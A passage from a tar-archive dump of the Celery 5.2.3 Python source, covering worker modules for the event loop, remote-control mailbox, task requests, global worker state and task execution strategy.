obj.register_with_event_loop(hub) consumer.consume() obj.on_ready() # did_start_ok will verify that pool processes were able to start, # but this will only work the first time we start, as # maxtasksperchild will mess up metrics. if not obj.restart_count and not obj.pool.did_start_ok(): raise WorkerLostError('Could not start worker processes') # consumer.consume() may have prefetched up to our # limit - drain an event so we're in a clean state # prior to starting our event loop. if connection.transport.driver_type == 'amqp': hub.call_soon(_quick_drain, connection) # FIXME: Use loop.run_forever # Tried and works, but no time to test properly before release. hub.propagate_errors = errors loop = hub.create_loop() try: while blueprint.state == RUN and obj.connection: state.maybe_shutdown() if heartbeat_error[0] is not None: raise heartbeat_error[0] # We only update QoS when there's no more messages to read. # This groups together qos calls, and makes sure that remote # control commands will be prioritized over task messages. if qos.prev != qos.value: update_qos() try: next(loop) except StopIteration: loop = hub.create_loop() finally: try: hub.reset() except Exception as exc: # pylint: disable=broad-except logger.exception( 'Error cleaning up after event loop: %r', exc) def synloop(obj, connection, consumer, blueprint, hub, qos, heartbeat, clock, hbrate=2.0, **kwargs): """Fallback blocking event loop for transports that doesn't support AIO.""" RUN = bootsteps.RUN on_task_received = obj.create_task_handler() perform_pending_operations = obj.perform_pending_operations heartbeat_error = [None] if getattr(obj.pool, 'is_green', False): heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate) consumer.on_message = on_task_received consumer.consume() obj.on_ready() while blueprint.state == RUN and obj.connection: state.maybe_shutdown() if heartbeat_error[0] is not None: raise heartbeat_error[0] if qos.prev != qos.value: qos.update() try: perform_pending_operations() connection.drain_events(timeout=2.0) except socket.timeout: pass except OSError: if blueprint.state == RUN: raise ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/pidbox.py0000664000175000017500000000705600000000000017340 0ustar00asifasif00000000000000"""Worker Pidbox (remote control).""" import socket import threading from kombu.common import ignore_errors from kombu.utils.encoding import safe_str from celery.utils.collections import AttributeDict from celery.utils.functional import pass1 from celery.utils.log import get_logger from . import control __all__ = ('Pidbox', 'gPidbox') logger = get_logger(__name__) debug, error, info = logger.debug, logger.error, logger.info class Pidbox: """Worker mailbox.""" consumer = None def __init__(self, c): self.c = c self.hostname = c.hostname self.node = c.app.control.mailbox.Node( safe_str(c.hostname), handlers=control.Panel.data, state=AttributeDict( app=c.app, hostname=c.hostname, consumer=c, tset=pass1 if c.controller.use_eventloop else set), ) self._forward_clock = self.c.app.clock.forward def on_message(self, body, message): # just increase clock as clients usually don't # have a valid clock to adjust with. self._forward_clock() try: self.node.handle_message(body, message) except KeyError as exc: error('No such control command: %s', exc) except Exception as exc: error('Control command error: %r', exc, exc_info=True) self.reset() def start(self, c): self.node.channel = c.connection.channel() self.consumer = self.node.listen(callback=self.on_message) self.consumer.on_decode_error = c.on_decode_error def on_stop(self): pass def stop(self, c): self.on_stop() self.consumer = self._close_channel(c) def reset(self): self.stop(self.c) self.start(self.c) def _close_channel(self, c): if self.node and self.node.channel: ignore_errors(c, self.node.channel.close) def shutdown(self, c): self.on_stop() if self.consumer: debug('Canceling broadcast consumer...') ignore_errors(c, self.consumer.cancel) self.stop(self.c) class gPidbox(Pidbox): """Worker pidbox (greenlet).""" _node_shutdown = None _node_stopped = None _resets = 0 def start(self, c): c.pool.spawn_n(self.loop, c) def on_stop(self): if self._node_stopped: self._node_shutdown.set() debug('Waiting for broadcast thread to shutdown...') self._node_stopped.wait() self._node_stopped = self._node_shutdown = None def reset(self): self._resets += 1 def _do_reset(self, c, connection): self._close_channel(c) self.node.channel = connection.channel() self.consumer = self.node.listen(callback=self.on_message) self.consumer.consume() def loop(self, c): resets = [self._resets] shutdown = self._node_shutdown = threading.Event() stopped = self._node_stopped = threading.Event() try: with c.connection_for_read() as connection: info('pidbox: Connected to %s.', connection.as_uri()) self._do_reset(c, connection) while not shutdown.is_set() and c.connection: if resets[0] < self._resets: resets[0] += 1 self._do_reset(c, connection) try: connection.drain_events(timeout=1.0) except socket.timeout: pass finally: stopped.set() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/worker/request.py0000664000175000017500000006117600000000000017546 0ustar00asifasif00000000000000"""Task request. This module defines the :class:`Request` class, that specifies how tasks are executed. """ import logging import sys from datetime import datetime from time import monotonic, time from weakref import ref from billiard.common import TERM_SIGNAME from kombu.utils.encoding import safe_repr, safe_str from kombu.utils.objects import cached_property from celery import current_app, signals from celery.app.task import Context from celery.app.trace import fast_trace_task, trace_task, trace_task_ret from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, TimeLimitExceeded, WorkerLostError) from celery.platforms import signals as _signals from celery.utils.functional import maybe, noop from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.serialization import get_pickled_exception from celery.utils.time import maybe_iso8601, maybe_make_aware, timezone from . import state __all__ = ('Request',) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. IS_PYPY = hasattr(sys, 'pypy_version_info') logger = get_logger(__name__) debug, info, warn, error = (logger.debug, logger.info, logger.warning, logger.error) _does_info = False _does_debug = False def __optimize__(): # this is also called by celery.app.trace.setup_worker_optimizations global _does_debug global _does_info _does_debug = logger.isEnabledFor(logging.DEBUG) _does_info = logger.isEnabledFor(logging.INFO) __optimize__() # Localize tz_or_local = timezone.tz_or_local send_revoked = signals.task_revoked.send send_retry = signals.task_retry.send task_accepted = state.task_accepted task_ready = state.task_ready revoked_tasks = state.revoked class Request: """A request for task execution.""" acknowledged = False time_start = None worker_pid = None time_limits = (None, None) _already_revoked = False _already_cancelled = False _terminate_on_ack = None _apply_result = None _tzlocal = None if not IS_PYPY: # pragma: no cover __slots__ = ( '_app', '_type', 'name', 'id', '_root_id', '_parent_id', '_on_ack', '_body', '_hostname', '_eventer', '_connection_errors', '_task', '_eta', '_expires', '_request_dict', '_on_reject', '_utc', '_content_type', '_content_encoding', '_argsrepr', '_kwargsrepr', '_args', '_kwargs', '_decoded', '__payload', '__weakref__', '__dict__', ) def __init__(self, message, on_ack=noop, hostname=None, eventer=None, app=None, connection_errors=None, request_dict=None, task=None, on_reject=noop, body=None, headers=None, decoded=False, utc=True, maybe_make_aware=maybe_make_aware, maybe_iso8601=maybe_iso8601, **opts): self._message = message self._request_dict = (message.headers.copy() if headers is None else headers.copy()) self._body = message.body if body is None else body self._app = app self._utc = utc self._decoded = decoded if decoded: self._content_type = self._content_encoding = None else: self._content_type, self._content_encoding = ( message.content_type, message.content_encoding, ) self.__payload = self._body if self._decoded else message.payload self.id = self._request_dict['id'] self._type = self.name = self._request_dict['task'] if 'shadow' in self._request_dict: self.name = self._request_dict['shadow'] or self.name self._root_id = self._request_dict.get('root_id') self._parent_id = self._request_dict.get('parent_id') timelimit = self._request_dict.get('timelimit', None) if timelimit: self.time_limits = timelimit self._argsrepr = self._request_dict.get('argsrepr', '') self._kwargsrepr = self._request_dict.get('kwargsrepr', '') self._on_ack = on_ack self._on_reject = on_reject self._hostname = hostname or gethostname() self._eventer = eventer self._connection_errors = connection_errors or () self._task = task or self._app.tasks[self._type] self._ignore_result = self._request_dict.get('ignore_result', False) # timezone means the message is timezone-aware, and the only timezone # supported at this point is UTC. eta = self._request_dict.get('eta') if eta is not None: try: eta = maybe_iso8601(eta) except (AttributeError, ValueError, TypeError) as exc: raise InvalidTaskError( f'invalid ETA value {eta!r}: {exc}') self._eta = maybe_make_aware(eta, self.tzlocal) else: self._eta = None expires = self._request_dict.get('expires') if expires is not None: try: expires = maybe_iso8601(expires) except (AttributeError, ValueError, TypeError) as exc: raise InvalidTaskError( f'invalid expires value {expires!r}: {exc}') self._expires = maybe_make_aware(expires, self.tzlocal) else: self._expires = None delivery_info = message.delivery_info or {} properties = message.properties or {} self._delivery_info = { 'exchange': delivery_info.get('exchange'), 'routing_key': delivery_info.get('routing_key'), 'priority': properties.get('priority'), 'redelivered': delivery_info.get('redelivered'), } self._request_dict.update({ 'properties': properties, 'reply_to': properties.get('reply_to'), 'correlation_id': properties.get('correlation_id'), 'hostname': self._hostname, 'delivery_info': self._delivery_info }) # this is a reference pass to avoid memory usage burst self._request_dict['args'], self._request_dict['kwargs'], _ = self.__payload self._args = self._request_dict['args'] self._kwargs = self._request_dict['kwargs'] @property def delivery_info(self): return self._delivery_info @property def message(self): return self._message @property def request_dict(self): return self._request_dict @property def body(self): return self._body @property def app(self): return self._app @property def utc(self): return self._utc @property def content_type(self): return self._content_type @property def content_encoding(self): return self._content_encoding @property def type(self): return self._type @property def root_id(self): return self._root_id @property def parent_id(self): return self._parent_id @property def argsrepr(self): return self._argsrepr @property def args(self): return self._args @property def kwargs(self): return self._kwargs @property def kwargsrepr(self): return self._kwargsrepr @property def on_ack(self): return self._on_ack @property def on_reject(self): return self._on_reject @on_reject.setter def on_reject(self, value): self._on_reject = value @property def hostname(self): return self._hostname @property def ignore_result(self): return self._ignore_result @property def eventer(self): return self._eventer @eventer.setter def eventer(self, eventer): self._eventer = eventer @property def connection_errors(self): return self._connection_errors @property def task(self): return self._task @property def eta(self): return self._eta @property def expires(self): return self._expires @expires.setter def expires(self, value): self._expires = value @property def tzlocal(self): if self._tzlocal is None: self._tzlocal = self._app.conf.timezone return self._tzlocal @property def store_errors(self): return (not self.task.ignore_result or self.task.store_errors_even_if_ignored) @property def task_id(self): # XXX compat return self.id @task_id.setter def task_id(self, value): self.id = value @property def task_name(self): # XXX compat return self.name @task_name.setter def task_name(self, value): self.name = value @property def reply_to(self): # used by rpc backend when failures reported by parent process return self._request_dict['reply_to'] @property def replaced_task_nesting(self): return self._request_dict.get('replaced_task_nesting', 0) @property def correlation_id(self): # used similarly to reply_to return self._request_dict['correlation_id'] def execute_using_pool(self, pool, **kwargs): """Used by the worker to send this task to the pool. Arguments: pool (~celery.concurrency.base.TaskPool): The execution pool used to execute this request. Raises: celery.exceptions.TaskRevokedError: if the task was revoked. """ task_id = self.id task = self._task if self.revoked(): raise TaskRevokedError(task_id) time_limit, soft_time_limit = self.time_limits trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret result = pool.apply_async( trace, args=(self._type, task_id, self._request_dict, self._body, self._content_type, self._content_encoding), accept_callback=self.on_accepted, timeout_callback=self.on_timeout, callback=self.on_success, error_callback=self.on_failure, soft_timeout=soft_time_limit or task.soft_time_limit, timeout=time_limit or task.time_limit, correlation_id=task_id, ) # cannot create weakref to None self._apply_result = maybe(ref, result) return result def execute(self, loglevel=None, logfile=None): """Execute the task in a :func:`~celery.app.trace.trace_task`. Arguments: loglevel (int): The loglevel used by the task. logfile (str): The logfile used by the task. """ if self.revoked(): return # acknowledge task as being processed. if not self.task.acks_late: self.acknowledge() _, _, embed = self._payload request = self._request_dict # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. request.update({ 'loglevel': loglevel, 'logfile': logfile, 'is_eager': False, }, **embed or {}) retval, I, _, _ = trace_task(self.task, self.id, self._args, self._kwargs, request, hostname=self._hostname, loader=self._app.loader, app=self._app) if I: self.reject(requeue=False) else: self.acknowledge() return retval def maybe_expire(self): """If expired, mark the task as revoked.""" if self._expires: now = datetime.now(self._expires.tzinfo) if now > self._expires: revoked_tasks.add(self.id) return True def terminate(self, pool, signal=None): signal = _signals.signum(signal or TERM_SIGNAME) if self.time_start: pool.terminate_job(self.worker_pid, signal) self._announce_revoked('terminated', True, signal, False) else: self._terminate_on_ack = pool, signal if self._apply_result is not None: obj = self._apply_result() # is a weakref if obj is not None: obj.terminate(signal) def cancel(self, pool, signal=None): signal = _signals.signum(signal or TERM_SIGNAME) if self.time_start: pool.terminate_job(self.worker_pid, signal) self._announce_cancelled() if self._apply_result is not None: obj = self._apply_result() # is a weakref if obj is not None: obj.terminate(signal) def _announce_cancelled(self): task_ready(self) self.send_event('task-cancelled') reason = 'cancelled by Celery' exc = Retry(message=reason) self.task.backend.mark_as_retry(self.id, exc, request=self._context) self.task.on_retry(exc, self.id, self.args, self.kwargs, None) self._already_cancelled = True send_retry(self.task, request=self._context, einfo=None) def _announce_revoked(self, reason, terminated, signum, expired): task_ready(self) self.send_event('task-revoked', terminated=terminated, signum=signum, expired=expired) self.task.backend.mark_as_revoked( self.id, reason, request=self._context, store_result=self.store_errors, ) self.acknowledge() self._already_revoked = True send_revoked(self.task, request=self._context, terminated=terminated, signum=signum, expired=expired) def revoked(self): """If revoked, skip task and mark state.""" expired = False if self._already_revoked: return True if self._expires: expired = self.maybe_expire() if self.id in revoked_tasks: info('Discarding revoked task: %s[%s]', self.name, self.id) self._announce_revoked( 'expired' if expired else 'revoked', False, None, expired, ) return True return False def send_event(self, type, **fields): if self._eventer and self._eventer.enabled and self.task.send_events: self._eventer.send(type, uuid=self.id, **fields) def on_accepted(self, pid, time_accepted): """Handler called when task is accepted by worker pool.""" self.worker_pid = pid # Convert monotonic time_accepted to absolute time self.time_start = time() - (monotonic() - time_accepted) task_accepted(self) if not self.task.acks_late: self.acknowledge() self.send_event('task-started') if _does_debug: debug('Task accepted: %s[%s] pid:%r', self.name, self.id, pid) if self._terminate_on_ack is not None: self.terminate(*self._terminate_on_ack) def on_timeout(self, soft, timeout): """Handler called if the task times out.""" if soft: warn('Soft time limit (%ss) exceeded for %s[%s]', timeout, self.name, self.id) else: task_ready(self) error('Hard time limit (%ss) exceeded for %s[%s]', timeout, self.name, self.id) exc = TimeLimitExceeded(timeout) self.task.backend.mark_as_failure( self.id, exc, request=self._context, store_result=self.store_errors, ) if self.task.acks_late and self.task.acks_on_failure_or_timeout: self.acknowledge() def on_success(self, failed__retval__runtime, **kwargs): """Handler called if the task was successfully processed.""" failed, retval, runtime = failed__retval__runtime if failed: if isinstance(retval.exception, (SystemExit, KeyboardInterrupt)): raise retval.exception return self.on_failure(retval, return_ok=True) task_ready(self, successful=True) if self.task.acks_late: self.acknowledge() self.send_event('task-succeeded', result=retval, runtime=runtime) def on_retry(self, exc_info): """Handler called if the task should be retried.""" if self.task.acks_late: self.acknowledge() self.send_event('task-retried', exception=safe_repr(exc_info.exception.exc), traceback=safe_str(exc_info.traceback)) def on_failure(self, exc_info, send_failed_event=True, return_ok=False): """Handler called if the task raised an exception.""" task_ready(self) exc = exc_info.exception is_terminated = isinstance(exc, Terminated) if is_terminated: # If the task was terminated and the task was not cancelled due # to a connection loss, it is revoked. # We always cancel the tasks inside the master process. # If the request was cancelled, it was not revoked and there's # nothing to be done. # According to the comment below, we need to check if the task # is already revoked and if it wasn't, we should announce that # it was. if not self._already_cancelled and not self._already_revoked: # This is a special case where the process # would not have had time to write the result. self._announce_revoked( 'terminated', True, str(exc), False) return elif isinstance(exc, MemoryError): raise MemoryError(f'Process got: {exc}') elif isinstance(exc, Reject): return self.reject(requeue=exc.requeue) elif isinstance(exc, Ignore): return self.acknowledge() elif isinstance(exc, Retry): return self.on_retry(exc_info) # (acks_late) acknowledge after result stored. requeue = False is_worker_lost = isinstance(exc, WorkerLostError) if self.task.acks_late: reject = ( self.task.reject_on_worker_lost and is_worker_lost ) ack = self.task.acks_on_failure_or_timeout if reject: requeue = True self.reject(requeue=requeue) send_failed_event = False elif ack: self.acknowledge() else: # supporting the behaviour where a task failed and # need to be removed from prefetched local queue self.reject(requeue=False) # This is a special case where the process would not have had time # to write the result. if not requeue and (is_worker_lost or not return_ok): # only mark as failure if task has not been requeued self.task.backend.mark_as_failure( self.id, exc, request=self._context, store_result=self.store_errors, ) signals.task_failure.send(sender=self.task, task_id=self.id, exception=exc, args=self.args, kwargs=self.kwargs, traceback=exc_info.traceback, einfo=exc_info) if send_failed_event: self.send_event( 'task-failed', exception=safe_repr(get_pickled_exception(exc_info.exception)), traceback=exc_info.traceback, ) if not return_ok: error('Task handler raised error: %r', exc, exc_info=exc_info.exc_info) def acknowledge(self): """Acknowledge task.""" if not self.acknowledged: self._on_ack(logger, self._connection_errors) self.acknowledged = True def reject(self, requeue=False): if not self.acknowledged: self._on_reject(logger, self._connection_errors, requeue) self.acknowledged = True self.send_event('task-rejected', requeue=requeue) def info(self, safe=False): return { 'id': self.id, 'name': self.name, 'args': self._args if not safe else self._argsrepr, 'kwargs': self._kwargs if not safe else self._kwargsrepr, 'type': self._type, 'hostname': self._hostname, 'time_start': self.time_start, 'acknowledged': self.acknowledged, 'delivery_info': self.delivery_info, 'worker_pid': self.worker_pid, } def humaninfo(self): return '{0.name}[{0.id}]'.format(self) def __str__(self): """``str(self)``.""" return ' '.join([ self.humaninfo(), f' ETA:[{self._eta}]' if self._eta else '', f' expires:[{self._expires}]' if self._expires else '', ]).strip() def __repr__(self): """``repr(self)``.""" return '<{}: {} {} {}>'.format( type(self).__name__, self.humaninfo(), self._argsrepr, self._kwargsrepr, ) @cached_property def _payload(self): return self.__payload @cached_property def chord(self): # used by backend.mark_as_failure when failure is reported # by parent process # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. _, _, embed = self._payload return embed.get('chord') @cached_property def errbacks(self): # used by backend.mark_as_failure when failure is reported # by parent process # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. _, _, embed = self._payload return embed.get('errbacks') @cached_property def group(self): # used by backend.on_chord_part_return when failures reported # by parent process return self._request_dict.get('group') @cached_property def _context(self): """Context (:class:`~celery.app.task.Context`) of this task.""" request = self._request_dict # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. _, _, embed = self._payload request.update(**embed or {}) return Context(request) @cached_property def group_index(self): # used by backend.on_chord_part_return to order return values in group return self._request_dict.get('group_index') def create_request_cls(base, task, pool, hostname, eventer, ref=ref, revoked_tasks=revoked_tasks, task_ready=task_ready, trace=None, app=current_app): default_time_limit = task.time_limit default_soft_time_limit = task.soft_time_limit apply_async = pool.apply_async acks_late = task.acks_late events = eventer and eventer.enabled if trace is None: trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret class Request(base): def execute_using_pool(self, pool, **kwargs): task_id = self.task_id if (self.expires or task_id in revoked_tasks) and self.revoked(): raise TaskRevokedError(task_id) time_limit, soft_time_limit = self.time_limits result = apply_async( trace, args=(self.type, task_id, self.request_dict, self.body, self.content_type, self.content_encoding), accept_callback=self.on_accepted, timeout_callback=self.on_timeout, callback=self.on_success, error_callback=self.on_failure, soft_timeout=soft_time_limit or default_soft_time_limit, timeout=time_limit or default_time_limit, correlation_id=task_id, ) # cannot create weakref to None # pylint: disable=attribute-defined-outside-init self._apply_result = maybe(ref, result) return result def on_success(self, failed__retval__runtime, **kwargs): failed, retval, runtime = failed__retval__runtime if failed: if isinstance(retval.exception, ( SystemExit, KeyboardInterrupt)): raise retval.exception return self.on_failure(retval, return_ok=True) task_ready(self) if acks_late: self.acknowledge() if events: self.send_event( 'task-succeeded', result=retval, runtime=runtime, ) return Request ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/state.py0000664000175000017500000001776100000000000017177 0ustar00asifasif00000000000000"""Internal worker state (global). This includes the currently active and reserved tasks, statistics, and revoked tasks. """ import os import platform import shelve import sys import weakref import zlib from collections import Counter from kombu.serialization import pickle, pickle_protocol from kombu.utils.objects import cached_property from celery import __version__ from celery.exceptions import WorkerShutdown, WorkerTerminate from celery.utils.collections import LimitedSet __all__ = ( 'SOFTWARE_INFO', 'reserved_requests', 'active_requests', 'total_count', 'revoked', 'task_reserved', 'maybe_shutdown', 'task_accepted', 'task_ready', 'Persistent', ) #: Worker software/platform information. SOFTWARE_INFO = { 'sw_ident': 'py-celery', 'sw_ver': __version__, 'sw_sys': platform.system(), } #: maximum number of revokes to keep in memory. REVOKES_MAX = 50000 #: maximum number of successful tasks to keep in memory. SUCCESSFUL_MAX = 1000 #: how many seconds a revoke will be active before #: being expired when the max limit has been exceeded. REVOKE_EXPIRES = 10800 #: how many seconds a successful task will be cached in memory #: before being expired when the max limit has been exceeded. SUCCESSFUL_EXPIRES = 10800 #: Mapping of reserved task_id->Request. requests = {} #: set of all reserved :class:`~celery.worker.request.Request`'s. reserved_requests = weakref.WeakSet() #: set of currently active :class:`~celery.worker.request.Request`'s. active_requests = weakref.WeakSet() #: A limited set of successful :class:`~celery.worker.request.Request`'s. successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX, expires=SUCCESSFUL_EXPIRES) #: count of tasks accepted by the worker, sorted by type. total_count = Counter() #: count of all tasks accepted by the worker all_total_count = [0] #: the list of currently revoked tasks. Persistent if ``statedb`` set. revoked = LimitedSet(maxlen=REVOKES_MAX, expires=REVOKE_EXPIRES) should_stop = None should_terminate = None def reset_state(): requests.clear() reserved_requests.clear() active_requests.clear() successful_requests.clear() total_count.clear() all_total_count[:] = [0] revoked.clear() def maybe_shutdown(): """Shutdown if flags have been set.""" if should_terminate is not None and should_terminate is not False: raise WorkerTerminate(should_terminate) elif should_stop is not None and should_stop is not False: raise WorkerShutdown(should_stop) def task_reserved(request, add_request=requests.__setitem__, add_reserved_request=reserved_requests.add): """Update global state when a task has been reserved.""" add_request(request.id, request) add_reserved_request(request) def task_accepted(request, _all_total_count=None, add_active_request=active_requests.add, add_to_total_count=total_count.update): """Update global state when a task has been accepted.""" if not _all_total_count: _all_total_count = all_total_count add_active_request(request) add_to_total_count({request.name: 1}) all_total_count[0] += 1 def task_ready(request, successful=False, remove_request=requests.pop, discard_active_request=active_requests.discard, discard_reserved_request=reserved_requests.discard): """Update global state when a task is ready.""" if successful: successful_requests.add(request.id) remove_request(request.id, None) discard_active_request(request) discard_reserved_request(request) C_BENCH = os.environ.get('C_BENCH') or os.environ.get('CELERY_BENCH') C_BENCH_EVERY = int(os.environ.get('C_BENCH_EVERY') or os.environ.get('CELERY_BENCH_EVERY') or 1000) if C_BENCH: # pragma: no cover import atexit from time import monotonic from billiard.process import current_process from celery.utils.debug import memdump, sample_mem all_count = 0 bench_first = None bench_start = None bench_last = None bench_every = C_BENCH_EVERY bench_sample = [] __reserved = task_reserved __ready = task_ready if current_process()._name == 'MainProcess': @atexit.register def on_shutdown(): if bench_first is not None and bench_last is not None: print('- Time spent in benchmark: {!r}'.format( bench_last - bench_first)) print('- Avg: {}'.format( sum(bench_sample) / len(bench_sample))) memdump() def task_reserved(request): """Called when a task is reserved by the worker.""" global bench_start global bench_first now = None if bench_start is None: bench_start = now = monotonic() if bench_first is None: bench_first = now return __reserved(request) def task_ready(request): """Called when a task is completed.""" global all_count global bench_start global bench_last all_count += 1 if not all_count % bench_every: now = monotonic() diff = now - bench_start print('- Time spent processing {} tasks (since first ' 'task received): ~{:.4f}s\n'.format(bench_every, diff)) sys.stdout.flush() bench_start = bench_last = now bench_sample.append(diff) sample_mem() return __ready(request) class Persistent: """Stores worker state between restarts. This is the persistent data stored by the worker when :option:`celery worker --statedb` is enabled. Currently only stores revoked task id's. """ storage = shelve protocol = pickle_protocol compress = zlib.compress decompress = zlib.decompress _is_open = False def __init__(self, state, filename, clock=None): self.state = state self.filename = filename self.clock = clock self.merge() def open(self): return self.storage.open( self.filename, protocol=self.protocol, writeback=True, ) def merge(self): self._merge_with(self.db) def sync(self): self._sync_with(self.db) self.db.sync() def close(self): if self._is_open: self.db.close() self._is_open = False def save(self): self.sync() self.close() def _merge_with(self, d): self._merge_revoked(d) self._merge_clock(d) return d def _sync_with(self, d): self._revoked_tasks.purge() d.update({ '__proto__': 3, 'zrevoked': self.compress(self._dumps(self._revoked_tasks)), 'clock': self.clock.forward() if self.clock else 0, }) return d def _merge_clock(self, d): if self.clock: d['clock'] = self.clock.adjust(d.get('clock') or 0) def _merge_revoked(self, d): try: self._merge_revoked_v3(d['zrevoked']) except KeyError: try: self._merge_revoked_v2(d.pop('revoked')) except KeyError: pass # purge expired items at boot self._revoked_tasks.purge() def _merge_revoked_v3(self, zrevoked): if zrevoked: self._revoked_tasks.update(pickle.loads(self.decompress(zrevoked))) def _merge_revoked_v2(self, saved): if not isinstance(saved, LimitedSet): # (pre 3.0.18) used to be stored as a dict return self._merge_revoked_v1(saved) self._revoked_tasks.update(saved) def _merge_revoked_v1(self, saved): add = self._revoked_tasks.add for item in saved: add(item) def _dumps(self, obj): return pickle.dumps(obj, protocol=self.protocol) @property def _revoked_tasks(self): return self.state.revoked @cached_property def db(self): self._is_open = True return self.open() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/strategy.py0000664000175000017500000001626500000000000017717 0ustar00asifasif00000000000000"""Task execution strategy (optimization).""" import logging from kombu.asynchronous.timer import to_timestamp from kombu.utils.encoding import safe_repr from celery import signals from celery.app import trace as _app_trace from celery.exceptions import InvalidTaskError from celery.utils.imports import symbol_by_name from celery.utils.log import get_logger from celery.utils.saferepr import saferepr from celery.utils.time import timezone from .request import create_request_cls from .state import task_reserved __all__ = ('default',) logger = get_logger(__name__) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. def hybrid_to_proto2(message, body): """Create a fresh protocol 2 message from a hybrid protocol 1/2 message.""" try: args, kwargs = body.get('args', ()), body.get('kwargs', {}) kwargs.items # pylint: disable=pointless-statement except KeyError: raise InvalidTaskError('Message does not have args/kwargs') except AttributeError: raise InvalidTaskError( 'Task keyword arguments must be a mapping', ) headers = { 'lang': body.get('lang'), 'task': body.get('task'), 'id': body.get('id'), 'root_id': body.get('root_id'), 'parent_id': body.get('parent_id'), 'group': body.get('group'), 'meth': body.get('meth'), 'shadow': body.get('shadow'), 'eta': body.get('eta'), 'expires': body.get('expires'), 'retries': body.get('retries', 0), 'timelimit': body.get('timelimit', (None, None)), 'argsrepr': body.get('argsrepr'), 'kwargsrepr': body.get('kwargsrepr'), 'origin': body.get('origin'), } headers.update(message.headers or {}) embed = { 'callbacks': body.get('callbacks'), 'errbacks': body.get('errbacks'), 'chord': body.get('chord'), 'chain': None, } return (args, kwargs, embed), headers, True, body.get('utc', True) def proto1_to_proto2(message, body): """Convert Task message protocol 1 arguments to protocol 2. Returns: Tuple: of ``(body, headers, already_decoded_status, utc)`` """ try: args, kwargs = body.get('args', ()), body.get('kwargs', {}) kwargs.items # pylint: disable=pointless-statement except KeyError: raise InvalidTaskError('Message does not have args/kwargs') except AttributeError: raise InvalidTaskError( 'Task keyword arguments must be a mapping', ) body.update( argsrepr=saferepr(args), kwargsrepr=saferepr(kwargs), headers=message.headers, ) try: body['group'] = body['taskset'] except KeyError: pass embed = { 'callbacks': body.get('callbacks'), 'errbacks': body.get('errbacks'), 'chord': body.get('chord'), 'chain': None, } return (args, kwargs, embed), body, True, body.get('utc', True) def default(task, app, consumer, info=logger.info, error=logger.error, task_reserved=task_reserved, to_system_tz=timezone.to_system, bytes=bytes, proto1_to_proto2=proto1_to_proto2): """Default task execution strategy. Note: Strategies are here as an optimization, so sadly it's not very easy to override. """ hostname = consumer.hostname connection_errors = consumer.connection_errors _does_info = logger.isEnabledFor(logging.INFO) # task event related # (optimized to avoid calling request.send_event) eventer = consumer.event_dispatcher events = eventer and eventer.enabled send_event = eventer and eventer.send task_sends_events = events and task.send_events call_at = consumer.timer.call_at apply_eta_task = consumer.apply_eta_task rate_limits_enabled = not consumer.disable_rate_limits get_bucket = consumer.task_buckets.__getitem__ handle = consumer.on_task_request limit_task = consumer._limit_task limit_post_eta = consumer._limit_post_eta Request = symbol_by_name(task.Request) Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app) revoked_tasks = consumer.controller.state.revoked def task_message_handler(message, body, ack, reject, callbacks, to_timestamp=to_timestamp): if body is None and 'args' not in message.payload: body, headers, decoded, utc = ( message.body, message.headers, False, app.uses_utc_timezone(), ) else: if 'args' in message.payload: body, headers, decoded, utc = hybrid_to_proto2(message, message.payload) else: body, headers, decoded, utc = proto1_to_proto2(message, body) req = Req( message, on_ack=ack, on_reject=reject, app=app, hostname=hostname, eventer=eventer, task=task, connection_errors=connection_errors, body=body, headers=headers, decoded=decoded, utc=utc, ) if _does_info: # Similar to `app.trace.info()`, we pass the formatting args as the # `extra` kwarg for custom log handlers context = { 'id': req.id, 'name': req.name, 'args': safe_repr(req.args), 'kwargs': safe_repr(req.kwargs), } info(_app_trace.LOG_RECEIVED, context, extra={'data': context}) if (req.expires or req.id in revoked_tasks) and req.revoked(): return signals.task_received.send(sender=consumer, request=req) if task_sends_events: send_event( 'task-received', uuid=req.id, name=req.name, args=req.argsrepr, kwargs=req.kwargsrepr, root_id=req.root_id, parent_id=req.parent_id, retries=req.request_dict.get('retries', 0), eta=req.eta and req.eta.isoformat(), expires=req.expires and req.expires.isoformat(), ) bucket = None eta = None if req.eta: try: if req.utc: eta = to_timestamp(to_system_tz(req.eta)) else: eta = to_timestamp(req.eta, app.timezone) except (OverflowError, ValueError) as exc: error("Couldn't convert ETA %r to timestamp: %r. Task: %r", req.eta, exc, req.info(safe=True), exc_info=True) req.reject(requeue=False) if rate_limits_enabled: bucket = get_bucket(task.name) if eta and bucket: consumer.qos.increment_eventually() return call_at(eta, limit_post_eta, (req, bucket, 1), priority=6) if eta: consumer.qos.increment_eventually() call_at(eta, apply_eta_task, (req,), priority=6) return task_message_handler if bucket: return limit_task(req, bucket, 1) task_reserved(req) if callbacks: [callback(req) for callback in callbacks] handle(req) return task_message_handler ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/worker.py0000664000175000017500000003426100000000000017362 0ustar00asifasif00000000000000"""WorkController can be used to instantiate in-process workers. The command-line interface for the worker is in :mod:`celery.bin.worker`, while the worker program is in :mod:`celery.apps.worker`. The worker program is responsible for adding signal handlers, setting up logging, etc. This is a bare-bones worker without global side-effects (i.e., except for the global state stored in :mod:`celery.worker.state`). The worker consists of several components, all managed by bootsteps (mod:`celery.bootsteps`). """ import os import sys from 